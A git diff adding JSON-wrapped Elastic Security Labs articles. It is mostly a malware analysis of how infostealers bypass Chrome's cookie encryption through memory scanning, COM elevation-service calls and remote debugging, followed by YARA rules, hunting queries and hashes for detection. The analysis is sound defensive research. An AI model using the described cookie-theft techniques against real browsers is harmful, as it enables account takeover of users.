```0xFFFF0000 00000000``` - ```0xFFFFFFFF FFFFFFFF```. 
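The decimal form of this user-mode/kernel-mode boundary follows directly from the ranges above, and can be verified with a quick check (Python, illustrative):

```python
# Upper bound of the x64 user-mode address range: 0x0000FFFF`FFFFFFFF
USER_MODE_MAX = 0x0000FFFFFFFFFFFF
print(USER_MODE_MAX)  # decimal form of the boundary: 281474976710655

# Any address above this value falls in the kernel-mode range
KERNEL_MODE_MIN = 0xFFFF000000000000
print(KERNEL_MODE_MIN > USER_MODE_MAX)
```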
The following EQL query can be used to detect ```NtReadVirtualMemory``` or ```NtWriteVirtualMemory``` API calls where the target address is a kernel mode one, which is abnormal behavior:\n\n```\napi where process.pid != 4 and process.Ext.api.name : \"WriteProcessMemory\"\n and process.executable != null and \n /* kernel mode address range - decimal */\n process.Ext.api.parameters.address > 281474976710655\n```\n \nHere is an example of these [alerts](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/privilege_escalation_suspicious_kernel_mode_address_manipulation.toml) triggering on exploits leveraging this primitive: \n\n\n\n\n## Conclusion\n\nDetecting elevation of privileges for specific vulnerabilities requires a deep understanding of the vulnerability and its exploitation methods, which is not common knowledge. Therefore, investing in generic behavioral detection mechanisms focusing on the exploit's effect on the system and frequently used primitives like [KASLR bypass](https://github.com/waleedassar/RestrictedKernelLeaks), [token swapping](https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/how-kernel-exploits-abuse-tokens-for-privilege-escalation), [PreviousMode abuse](https://research.nccgroup.com/2020/05/25/cve-2018-8611-exploiting-windows-ktm-part-5-5-vulnerability-detection-and-a-better-read-write-primitive/#previousmode-abuse), and others proves more effective. However, for highly targeted Windows system components such as CLFS and win32k, dedicated detections are always valuable - ideally a combination of behavior and YARA.\n\nDespite the technical intricacies and the absence of logs for common primitives, the blue team should not disregard exploit and vulnerability research content; rather, they should endeavor to comprehend and apply it. 
Additionally, sharing in-the-wild LPE exploit samples with the defensive community via VirusTotal or similar platforms will further facilitate the testing and enhancement of detection controls.\n\nAdditional detection rules for [exploitation for privilege escalation](https://attack.mitre.org/techniques/T1068/) can be accessed [here](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1068%22&type=code&p=1).\n\n## References\n - https://i.blackhat.com/USA-22/Thursday/us-22-Jin-The-Journey-Of-Hunting-ITW-Windows-LPE-0day-wp.pdf\n - https://securelist.com/windows-clfs-exploits-ransomware/111560/\n - https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part2-exploit-analysis\n - https://googleprojectzero.github.io/0days-in-the-wild/rca.html\n - https://conference.hitb.org/hitbsecconf2023ams/session/hunting-windows-desktop-window-manager-bugs/\n - https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/\n\n\n\n\n\n\n\n\n"
+ },
+ "title": "In-the-Wild Windows LPE 0-days: Insights & Detection Strategies",
+ "slug": "itw-windows-lpe-0days-insights-and-detection-strategies",
+ "date": "2024-03-29",
+ "description": "This article will evaluate detection methods for Windows local privilege escalation techniques based on dynamic behavior analysis using Elastic Defend features.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "image18.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ }
+ ],
+ "tags": [
+ {
+ "slug": "windows"
+ }
+ ]
+ },
+ "id": "security_labs_content-itw_windows_lpe_0days_insights_and_detection_strategies-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-katz_and_mouse_game-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-katz_and_mouse_game-md.json
new file mode 100644
index 00000000000..503cf612568
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-katz_and_mouse_game-md.json
@@ -0,0 +1,50 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Katz and Mouse Game: MaaS Infostealers Adapt to Patched Chrome Defenses\"\nslug: \"katz-and-mouse-game\"\ndate: \"2024-10-28\"\ndescription: \"Elastic Security Labs breaks down bypass implementations from the infostealer ecosystem’s reaction to Chrome 127's Application-Bound Encryption scheme.\"\nauthor:\n - slug: jia-yu-chan\n - slug: salim-bitam\n - slug: daniel-stepanic\n - slug: samir-bousseaden\n - slug: cyril-francois\n - slug: seth-goodwin\nimage: \"Security Labs Images 2.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - infostealer\n - chrome\n - cookie\n - VIDAR\n - STEALC\n - LUMMA\n - METASTEALER\n - PHEMEDRONE\n - XENOSTEALER\n---\n\n# Introduction\n\nIn July, Google [announced](https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html) a new protection mechanism for cookies stored within Chrome on Windows, known as Application-Bound Encryption. There is no doubt this security implementation has raised the bar and directly impacted the malware ecosystem. After months with this new feature, many infostealers have written new code to bypass this protection (as the Chrome Security Team predicted) in order to stay competitive in the market and deliver capabilities that reliably retrieve cookie data from Chrome browsers.\n\nElastic Security Labs has been tracking a subset of this activity, identifying multiple techniques used by different malware families to circumvent App-Bound Encryption. While the ecosystem is still evolving in light of this pressure, our goal is to share technical details that help organizations understand and defend against these techniques. 
In this article, we will cover the different methods used by the following infostealer families:\n\n - STEALC/VIDAR\n - METASTEALER\n - PHEMEDRONE\n - XENOSTEALER\n - LUMMA\n\n# Key takeaways\n\n - Latest versions of infostealers implement bypasses around Google’s recent cookie protection feature using Application-Bound Encryption\n - Techniques include integrating offensive security tool ChromeKatz, leveraging COM to interact with Chrome services and decrypt the app-bound encryption key, and using the remote debugging feature within Chrome\n - Defenders should actively monitor for different cookie bypass techniques against Chrome on Windows in anticipation of future mitigations and bypasses likely to emerge in the near- to mid-term\n - Elastic Security provides mitigations through memory signatures, behavioral rules, and hunting opportunities to enable faster identification and response to infostealer activity\n\n# Background\n\nGenerically speaking, cookies are used by web applications to store visitor information in the browser the visitor uses to access that web app. This information helps the web app track that user, their preferences, and other information from location to location– even across devices.\n\nThe authentication token is one use of the client-side data storage structures that enables much of how modern web interactivity works. These tokens are stored by the browser after the user has successfully authenticated with a web application. 
After username and password, after multifactor authentication (MFA) via one-time passcodes or biometrics, the web application “remembers” your browser is you via the exchange of this token with each subsequent web request.\n\nA malicious actor who gets access to a valid authentication token can reuse it to impersonate the user to that web service with the ability to take over accounts, steal personal or financial information, or perform other actions as that user such as transfer financial assets.\n\nCybercriminals use infostealers to steal and commoditize this type of information for their financial gain.\n\n## Google Chrome Cookie Security\n\nLegacy versions of Google Chrome on Windows used the Windows native [Data Protection API](https://learn.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection) (DPAPI) to encrypt cookies and protect them from other user contexts. This provided adequate protection against several attack scenarios, but any malicious software running in the targeted user’s context could decrypt these cookies using the DPAPI methods directly. Unfortunately, this context is exactly the niche that infostealers often find themselves in after social engineering for initial access. The DPAPI scheme is now [well known to attackers](https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107) with several attack vectors; from local decryption using the API, to stealing the masterkey and decrypting remotely, to abusing the domain-wide backup DPAPI key in an enterprise environment.\n\nWith the release of Chrome 127 in July 2024, Google [implemented](https://developer.chrome.com/release-notes/127) Application-Bound Encryption of browser data. This mechanism directly addressed many common DPAPI attacks against Windows Chrome browser data–including cookies. 
It does this by storing the data in encrypted datafiles, and using a service running as SYSTEM to verify any decryption attempts are coming from the Chrome process before returning the key to that process for decryption of the stored data.\n\n\n\n\n\nWhile it is our view that this encryption scheme is not a panacea to protect all browser data (as the Chrome Security Team acknowledges in their release) we do feel it has been successful in driving malware authors to TTPs that are more overtly malicious, and easier for defenders to identify and respond to.\n\n# Stealer Bypass Techniques, Summarized\n\nThe following sections will describe specific infostealer techniques used to bypass Google’s App-Bound Encryption feature as observed by Elastic. Although this isn’t an exhaustive compilation of bypasses, and development of these families is ongoing, they represent an interesting dynamic within the infostealer space showing how malware developers responded to Google’s recently updated security control. The techniques observed by our team include:\n\n - Remote debugging via Chrome’s DevTools Protocol\n - Reading process memory of Chrome network service process (ChromeKatz and ```ReadProcessMemory``` (RPM))\n - Elevating to ```SYSTEM``` then decrypting ```app_bound_encryption_key``` with the ```DecryptData``` method of ```GoogleChromeElevationService``` through COM\n\n\n\n## STEALC/VIDAR\n\nOur team observed new code introduced to STEALC/VIDAR related to the cookie bypass technique around September 20th. These were atypical samples that stood out from previous versions and were implemented as embedded 64-bit PE files along with conditional checks. 
Encrypted values in the SQLite databases where Chrome stores its data are now prefixed with v20, indicating that the values are now encrypted using application-bound encryption.\n\n> [STEALC](https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc) was introduced in 2023 and was developed with “heavy inspiration” from other more established stealers such as [RACOON](https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon) and [VIDAR](https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar). STEALC and VIDAR have continued concurrent development, and in the case of App-Bound Encryption bypasses have settled on the same implementation.\n\nDuring the extraction of encrypted data from the databases the malware checks for this prefix. If it begins with ```v20```, a child process is spawned using the embedded PE file in the ```.data``` section of the binary. This program is responsible for extracting unencrypted cookie values residing in one of Chrome's child processes. \n\n\n\nThis embedded binary creates a hidden desktop via ```OpenDesktopA``` / ```CreateDesktopA``` then uses ```CreateToolhelp32Snapshot``` to scan and terminate all ```chrome.exe``` processes. A new ```chrome.exe``` process is then started with the new desktop object. Based on the installed version of Chrome, the malware selects a signature pattern for the Chromium feature [CookieMonster](https://www.chromium.org/developers/design-documents/network-stack/cookiemonster/), an internal component used to manage cookies.\n\n\n\nWe used the [signature patterns](https://github.com/Meckazin/ChromeKatz/blob/9152004174e9a0b2d092c70ebc75efbf80fa1098/CookieKatz/Main.cpp#L123) to pivot to existing code developed for an offensive security tool called [ChromeKatz](https://github.com/Meckazin/ChromeKatz). At this time, the patterns have been removed from the ChromeKatz repository and replaced with a new technique. 
Based on our analysis, the malware author appears to have reimplemented ChromeKatz within STEALC in order to bypass the app-bound encryption protection feature. \n\nOnce the malware identifies a matching signature, it enumerates Chrome’s child processes to check for the presence of the ```--utility-sub-type=network.mojom.NetworkService``` command-line flag. This flag indicates that the process is the network service responsible for handling all internet communication. It becomes a prime target as it holds the sensitive data the attacker seeks, as described in MDSec’s [post](https://www.mdsec.co.uk/2021/01/breaking-the-browser-a-tale-of-ipc-credentials-and-backdoors/). It then returns a handle for that specific child process. \n\n\n\nNext, it enumerates each module in the network service child process to find and retrieve the base address and size of ```chrome.dll``` loaded into memory. STEALC uses [```CredentialKatz::FindDllPattern```](https://github.com/Meckazin/ChromeKatz/blob/767047dcf8f53c70be5e3e0859c5eee3f129d758/CredentialKatz/Memory.cpp#L280) and [```CookieKatz::FindPattern```](https://github.com/Meckazin/ChromeKatz/blob/767047dcf8f53c70be5e3e0859c5eee3f129d758/CookieKatz/Memory.cpp#L435) to locate the CookieMonster instances. There are 2 calls to ```CredentialKatz::FindDllPattern```.\n\n\n\nIn the first call to ```CredentialKatz::FindDllPattern```, it tries to locate one of the signature patterns (depending on the victim’s Chrome version) in ```chrome.dll```. 
Once found, STEALC now has a reference pointer to that memory location where the byte sequence begins, which is the function ```net::CookieMonster::~CookieMonster```, destructor of the ```CookieMonster``` class.\n\n\n\nThe second call to ```CredentialKatz::FindDllPattern``` passes in the function address for ```net::CookieMonster::~CookieMonster(void)``` as an argument for the byte sequence search, resulting in STEALC having a pointer to ```CookieMonster```’s Virtual Function Pointer struct.\n\n\n\nThe following method used by STEALC is, again, identical to ChromeKatz, where it locates ```CookieMonster``` instances by scanning memory chunks in the ```chrome.dll``` module for pointers referencing the ```CookieMonster``` vtable. Since the vtable is a constant across all objects of a given class, any ```CookieMonster``` object will have the same vtable pointer. When a match is identified, STEALC treats the memory location as a ```CookieMonster``` instance and stores its address in an array.\n\n\n\nFor each identified ```CookieMonster``` instance, STEALC accesses the internal ```CookieMap``` structure located at an offset of ```+0x30```, which is a binary tree. Each node within this tree contains pointers to ```CanonicalCookieChrome``` structures. ```CanonicalCookieChrome``` structures hold unencrypted cookie data, making it accessible for extraction. STEALC then initiates a tree traversal by passing the first node into a dedicated traversal function.\n\n\n\nFor each node, it calls ```ReadProcessMemory``` to access the ```CanonicalCookieChrome``` structure from the target process’s memory, then further processes it in ```jy::GenerateExfilString```. \n\n\n\nSTEALC formats the extracted cookie data by converting the expiration date to UNIX format and verifying the presence of the ```HttpOnly``` and ```Secure``` flags. It then appends details such as the cookie's name, value, domain, path, and the ```HttpOnly``` and ```Secure``` flags into a final string for exfiltration. 
[```OptimizedString```](https://github.com/Meckazin/ChromeKatz/blob/9152004174e9a0b2d092c70ebc75efbf80fa1098/CookieKatz/Memory.cpp#L10) structs are used in place of strings, so string values can either be the string itself, or if the string length is greater than 23, it will point to the address storing the string. \n\n\n\n## METASTEALER\n\n[METASTEALER](https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer), first observed in 2022, recently upgraded its ability to steal Chrome data, bypassing Google’s latest mitigation efforts. On September 30th, the malware authors announced this update via their Telegram channel, highlighting its enhanced capability to extract sensitive information, including cookies, despite the security changes in Chrome's version ```129+```.\n\n\n\n\n\nThe [first sample](https://www.virustotal.com/gui/file/973a9056040af402d6f92f436a287ea164fae09c263f80aba0b8d5366ed9957a) observed in the wild by our team was discovered on September 30th, the same day the authors promoted the update. Despite claims that the malware operates without needing ```Administrator``` privileges, our testing revealed it does require elevated access, as it attempts to impersonate the ```SYSTEM``` token during execution.\n\n\n\nAs shown in the screenshots above, the ```get_decryption``` method now includes a new Boolean parameter. This value is set to ```TRUE``` if the encrypted data (cookie) begins with the ```v20``` prefix, indicating that the cookie is encrypted using Chrome's latest encryption method. The updated function retains backward compatibility, still supporting the decryption of cookies from older Chrome versions if present on the infected machine.\n\nThe malware then attempts to access the ```Local State``` or ```LocalPrefs.json``` files located in the Chrome profile directory. Both files are JSON formatted and store encryption keys (```encrypted_key```) for older Chrome versions and ```app_bound_encrypted_key``` for newer ones. 
If the flag is set to ```TRUE```, the malware specifically uses the ```app_bound_encrypted_key``` to decrypt cookies in line with the updated Chrome encryption method.\n\n\n\nIn this case, the malware first impersonates the ```SYSTEM``` token using a newly introduced class called ```ContextSwitcher```.\n\n\n\nIt then decrypts the key by creating, via COM, an instance of the Chrome service responsible for decryption, named ```GoogleChromeElevationService```, using the CLSID ```708860E0-F641-4611-8895-7D867DD3675B```. Once initialized, it invokes the [```DecryptData```](https://github.com/chromium/chromium/blob/225f82f8025e4f93981310fd33daa71dc972bfa9/chrome/elevation_service/elevator.cc#L155) method to decrypt the ```app_bound_encrypted_key``` key, which will be used to decrypt the encrypted cookies.\n\n\n\nMETASTEALER employs a technique similar to the one demonstrated in a [gist](https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824) shared [on X](https://x.com/snovvcrash/status/1839715912812802162) on September 27th, which may have served as inspiration for the malware authors. Both approaches leverage similar methods to bypass Chrome's encryption mechanisms and extract sensitive data.\n\n## PHEMEDRONE\n\nThis [open-source stealer](https://malpedia.caad.fkie.fraunhofer.de/details/win.phemedrone_stealer) caught the world’s attention earlier in the year through its use of a Windows SmartScreen vulnerability (CVE-2023-36025). 
While its development is still occurring on Telegram, our team found a recent [release](https://www.virustotal.com/gui/file/1067d27007ea862ddd68e90ef68b6d17fa18f9305c09f72bad04d00102a60b8c) (2.3.2) submitted at the end of September including new cookie grabber functionality for Chrome.\n\n\n\nThe malware first enumerates the different profiles within Chrome, then performs a browser check using function (```BrowserHelpers.NewEncryption```) checking for the Chrome browser with a version greater than or equal to ```127```.\n\n\n\nIf the condition matches, PHEMEDRONE uses a combination of helper functions to extract the cookies.\n\n\n\nBy viewing the ```ChromeDevToolsWrapper``` class and its different functions, we can see that PHEMEDRONE sets up a remote debugging session within Chrome to access the cookies. The default port (```9222```) is used along with window-position set to ```-2400```,```-2400``` which is set off-screen preventing any visible window from alerting the victim.\n\n\n\nNext, the malware establishes a WebSocket connection to Chrome’s debugging interface making a request using deprecated Chrome DevTools Protocol method (```Network.getAllCookies```). \n\n\n\nThe cookies are then returned from the previous request in plaintext, below is a network capture showing this behavior:\n\n\n\n## XENOSTEALER\n\n[XENOSTEALER](https://github.com/moom825/XenoStealer/) is an open-source infostealer hosted on GitHub. It appeared in July 2024 and is under active development at the time of this publication. Notably, the Chrome bypass feature was committed on September 26, 2024.\n\nThe approach taken by XENOSTEALER is similar to that of METASTEALER. It first parses the JSON file under a given Chrome profile to extract the ```app_bound_encrypted_key```. However, the decryption process occurs within a Chrome process. 
To achieve this, XENOSTEALER launches an instance of ```Chrome.exe```, then injects code using a helper class called [```SharpInjector```](https://github.com/moom825/XenoStealer/blob/d1c7e242183a2c8582c179a1b546f0a5cdff5f75/XenoStealer/Injector/SharpInjector.cs), passing the encrypted key as a parameter.\n\nThe injected code subsequently calls the ```DecryptData``` method from the ```GoogleChromeElevationService``` to obtain the decrypted key.\n\n \n\n## LUMMA\n\nIn mid-October, the latest version of [LUMMA](https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma) implemented a new method to bypass Chrome cookie protection, as reported by [@g0njxa](https://x.com/g0njxa).\n\n\n\nWe analyzed a recent version of LUMMA, confirming that it managed to successfully recover the cookie data from the latest version of Google Chrome (```130.0.6723.70```). LUMMA first creates a visible Chrome process via ```Kernel32!CreateProcessW```.\n\n\n\nThis activity was followed up in the debugger with multiple calls to ```NtReadVirtualMemory``` where we identified LUMMA searching within the Chrome process for ```chrome.dll```.\n\n\n\nOnce found, the malware copies the ```chrome.dll``` image to its own process memory using ```NtReadVirtualMemory```. In a similar fashion to the ChromeKatz technique, Lumma leverages pattern scanning to target Chrome’s ```CookieMonster``` component. \n\n\n\nLumma uses an obfuscated signature pattern to pinpoint the ```CookieMonster``` functionality:\n\n```\n3Rf5Zn7oFA2a????k4fAsdxx????l8xX5vJnm47AUJ8uXUv2bA0s34S6AfFA????kdamAY3?PdE????6G????L8v6D8MJ4uq????k70a?oAj7a3????????K3smA????maSd?3l4\n```\n\nBelow is the YARA rule after de-obfuscation:\n\n```\nrule lumma_stealer\n{\n meta:\n author = \"Elastic Security Labs\"\n strings:\n $lumma_pattern = { 56 57 48 83 EC 28 89 D7 48 89 CE E8 ?? ?? ?? ?? 85 FF 74 08 48 89 F1 E8 ?? ?? ?? ?? 48 89 F0 48 83 C4 28 5F 5E C3 CC CC CC CC CC CC CC CC CC CC 56 57 48 83 EC 38 48 89 CE 48 8B 05 ?? ?? ?? ?? 
48 31 E0 48 89 44 24 ?? 48 8D 79 ?? ?? ?? ?? 28 E8 ?? ?? ?? ?? 48 8B 46 20 48 8B 4E 28 48 8B 96 ?? ?? ?? ?? 4C 8D 44 24 ?? 49 89 10 48 C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 FA FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 31 E1}\n condition:\n all of them\n}\n```\n\nAfter decoding and searching for the pattern in ```chrome.dll```, this leads to the ```CookieMonster``` destructor ([```net::CookieMonster::~CookieMonster```](https://chromium.googlesource.com/chromium/src/net/+/master/cookies/cookie_monster.cc#657)).\n\n\n\nThe cookies are then identified in memory and dumped out in clear text from the Chrome process.\n\n\n\nOnce completed, LUMMA sends out the cookies along with the other requested data as multiple zip files (xor encrypted and base64 encoded) to the C2 server.\n\n\n\n# Detection\n\nBelow are the following behavioral detections that can be used to identify techniques used by information stealers: \n\n - [Web Browser Credential Access via Unusual Process](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/credential_access_web_browser_credential_access_via_unusual_process.toml#L8)\n - [Web Browser Credential Access via Unsigned Process](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/credential_access_web_browser_credential_access_via_unsigned_process.toml#L8)\n - [Access to Browser Credentials from Suspicious Memory](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/credential_access_access_to_browser_credentials_from_suspicious_memory.toml#L8)\n - [Failed Access Attempt to Web Browser Files](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/credential_access_failed_access_attempt_to_web_browser_files.toml#L8)\n - [Browser Debugging from Unusual 
Parent](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/credential_access_browser_debugging_from_unusual_parent.toml#L3)\n - [Potential Browser Information Discovery](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/discovery_potential_browser_information_discovery.toml#L8)\n\nAdditionally, the following queries can be used for hunting diverse related abnormal behaviors: \n\n## Cookies access by an unusual process\n\nThis query uses file open events, aggregates accesses by process, and then looks for processes that are observed on only a few hosts and have a low total access count:\n\n``` sql\nFROM logs-endpoint.events.file-default*\n| where event.category == \"file\" and event.action == \"open\" and file.name == \"Cookies\" and file.path like \"*Chrome*\"\n| keep file.path, process.executable, agent.id\n| eval process_path = replace(to_lower(process.executable), \"\"\"c:\\\\users\\\\[a-zA-Z0-9\\.\\-\\_\\$]+\\\\\"\"\", \"c:\\\\\\\\users\\\\\\\\user\\\\\\\\\")\n| stats agents_count = COUNT_DISTINCT(agent.id), access_count = count(*) by process_path\n| where agents_count <= 2 and access_count <= 2\n```\n\nBelow is an example of matches from diverse information stealers, including the updated ones with new Chrome cookie-stealing capabilities: \n\n\n\nMETASTEALER tends to first terminate all running Chrome instances and then call [```CoCreateInstance```](https://learn.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cocreateinstance) to instantiate the Google Chrome [elevation service](https://chromium.googlesource.com/chromium/src/+/main/chrome/elevation_service/). This series of events can be expressed with the following EQL query: \n\n``` sql\nsequence by host.id with maxspan=1s\n[process where event.action == \"end\" and process.name == \"chrome.exe\"] with runs=5\n[process where event.action == \"start\" and process.name == 
\"elevation_service.exe\"]\n```\n\n\n\nThe previous hunt indicates suspicious agents but doesn't identify the source process. By [enabling registry object access auditing through event 4663](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4663) on the Chrome Elevation service CLSID registry key ```{708860E0-F641-4611-8895-7D867DD3675B}```, we can detect unusual processes attempting to access that key: \n\n\n\n``` sql\nFROM logs-system.security-default* | where event.code == \"4663\" and winlog.event_data.ObjectName == \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{708860E0-F641-4611-8895-7D867DD3675B}\" and not winlog.event_data.ProcessName in (\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\") and not winlog.event_data.ProcessName like \"C:\\\\\\\\Program Files\\\\\\\\Google\\\\\\\\Chrome\\\\\\\\Application\\\\\\\\*\\\\\\\\elevation_service.exe\" | stats agents_count = COUNT_DISTINCT(agent.id), access_count= count(*) by winlog.event_data.ProcessName | where agents_count <= 2 and access_count <=2\n```\n\nBelow is an example of matches on the METASTEALER malware while calling ```CoCreateInstance (CLSID_Elevator)```: \n\n\n\nThe [PHEMEDRONE](https://malpedia.caad.fkie.fraunhofer.de/details/win.phemedrone_stealer) stealer uses the [known](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) browser debugging method to collect cookies via Chromium API, this can be observed in the following screenshot where we can see an instance of NodeJs communicating with a browser instance with debugging enabled over port ```9222```:\n\n\n\nThe following EQL query can be used to look for unusual processes performing similar behavior: \n\n``` sql\nsequence by host.id, destination.port with maxspan=5s\n[network where event.action == 
\"disconnect_received\" and\n network.direction == \"ingress\" and\n process.executable in~ (\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\") and\n source.address like \"127.*\" and destination.address like \"127.*\"]\n[network where event.action == \"disconnect_received\" and network.direction == \"egress\" and not\n process.executable in~ (\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\") and source.address like \"127.*\" and destination.address like \"127.*\"]\n```\n\n\n\n## Chrome Browser Spawned from an Unusual Parent\n\nThe STEALC sample that uses the ChromeKatz implementation spawns an instance of Google Chrome to load the user's default profile. Looking at the usual parent executables, legitimate parents turn out to be limited to Chrome-signed binaries and Explorer.exe; the following ES|QL query can be used to find unusual parents: \n\n``` sql\nFROM logs-endpoint.events.process-*\n| where event.category == \"process\" and event.type == \"start\" and to_lower(process.name) == \"chrome.exe\" and process.command_line like \"*--profile-directory=Default*\"\n| eval process_parent_path = replace(to_lower(process.parent.executable), \"\"\"c:\\\\users\\\\[a-zA-Z0-9\\.\\-\\_\\$]+\\\\\"\"\", \"c:\\\\\\\\users\\\\\\\\user\\\\\\\\\")\n| stats agents_count = COUNT_DISTINCT(agent.id), total_executions = count(*) by process_parent_path\n| where agents_count == 1 and total_executions <= 10\n```\n\n\n\n## Untrusted Binaries from Chrome Application folder\n\nSince the Chrome elevation service [trusts](https://github.com/chromium/chromium/blob/main/chrome/elevation_service/caller_validation.cc#L33-L56) binaries running from the Chrome ```program files``` folder, the following queries can be used to hunt for unsigned or untrusted binaries executed or loaded from there: \n\n### Unsigned DLLs loaded from the Google Chrome application folder\n\n``` sql\nFROM logs-endpoint.events.library*\n| where event.category == \"library\" and event.action == \"load\" and to_lower(dll.path) like \"c:\\\\\\\\program files\\\\\\\\google\\\\\\\\chrome\\\\\\\\application\\\\\\\\*\" and not (dll.code_signature.trusted == true)\n| keep process.executable, dll.path, dll.hash.sha256, agent.id\n| stats agents_count = COUNT_DISTINCT(agent.id), total_executions = count(*) by process.executable, dll.path, dll.hash.sha256\n| where agents_count == 1 and total_executions <= 10\n```\n\n### Unsigned executables launched from the Google Chrome application folder\n\n``` sql\nFROM logs-endpoint.events.process*\n| where event.category == \"process\" and event.type == \"start\" and (to_lower(process.executable) like \"c:\\\\\\\\program files\\\\\\\\google\\\\\\\\chrome\\\\\\\\application\\\\\\\\*\" or to_lower(process.executable) like \"c:\\\\\\\\scoped_dir\\\\\\\\program files\\\\\\\\google\\\\\\\\chrome\\\\\\\\application\\\\\\\\*\")\nand not (process.code_signature.trusted == true and process.code_signature.subject_name == \"Google LLC\")\n| keep process.executable, process.hash.sha256, agent.id\n| stats agents_count = COUNT_DISTINCT(agent.id), total_executions = count(*) by process.executable, process.hash.sha256\n| where agents_count == 1 and total_executions <= 10\n```\n\n\n\n# Conclusion\n\nGoogle has raised the bar by implementing new security controls to protect cookie data within Chrome. As expected, this has caused malware developers to develop or integrate their own bypasses. We hope Google will continue to innovate to provide stronger protection for user data. \n\nOrganizations and defenders should consistently monitor for unusual endpoint activity. While these new techniques may be successful, they are also noisy and detectable with the right security instrumentation, processes, and personnel. 
\n\n## Stealer Bypasses and MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n - [Credential Access](https://attack.mitre.org/tactics/TA0006/)\n - [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n - [Discovery](https://attack.mitre.org/tactics/TA0007/)\n - [Execution](https://attack.mitre.org/tactics/TA0002/)\n\n### Techniques\n\nTechniques represent how an adversary achieves a tactical goal by performing an action.\n\n - [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539/)\n - [Process Injection](https://attack.mitre.org/techniques/T1055/)\n - [Credentials from Password Stores](https://attack.mitre.org/techniques/T1555/)\n - [System Information Discovery](https://attack.mitre.org/techniques/T1082/)\n - [Process Discovery](https://attack.mitre.org/techniques/T1057/)\n - [Inter-Process Communication: Component Object Model](https://attack.mitre.org/techniques/T1559/001/)\n\n## YARA\n\nElastic Security has created YARA rules to identify this activity. 
\n\n - [Windows.Trojan.Stealc](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Stealc.yar)\n - [Windows.Infostealer.PhemedroneStealer](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Infostealer_PhemedroneStealer.yar)\n - [Windows.Trojan.MetaStealer](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_MetaStealer.yar)\n - [Windows.Trojan.Xeno](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Xeno.yar)\n - [Windows.Trojan.Lumma](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Lumma.yar)\n - [Windows.Infostealer.Generic](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Infostealer_Generic.yar)\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/app-bound_bypass) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|-----|-----|-----|-----|\n| 27e4a3627d7df2b22189dd4bebc559ae1986d49a8f4e35980b428fadb66cf23d | SHA-256 | num.exe | STEALC |\n| 08d9d4e6489dc5b05a6caa434fc36ad6c1bd8c8eb08888f61cbed094eac6cb37 | SHA-256 | HardCoreCrack.exe | PHEMEDRONE |\n| 43cb70d31daa43d24e5b063f4309281753176698ad2aba9c557d80cf710f9b1d | SHA-256 | Ranginess.exe | METASTEALER |\n| 84033def9ffa70c7b77ce9a7f6008600c0145c28fe5ea0e56dfafd8474fb8176 | SHA-256 | | LUMMA |\n| 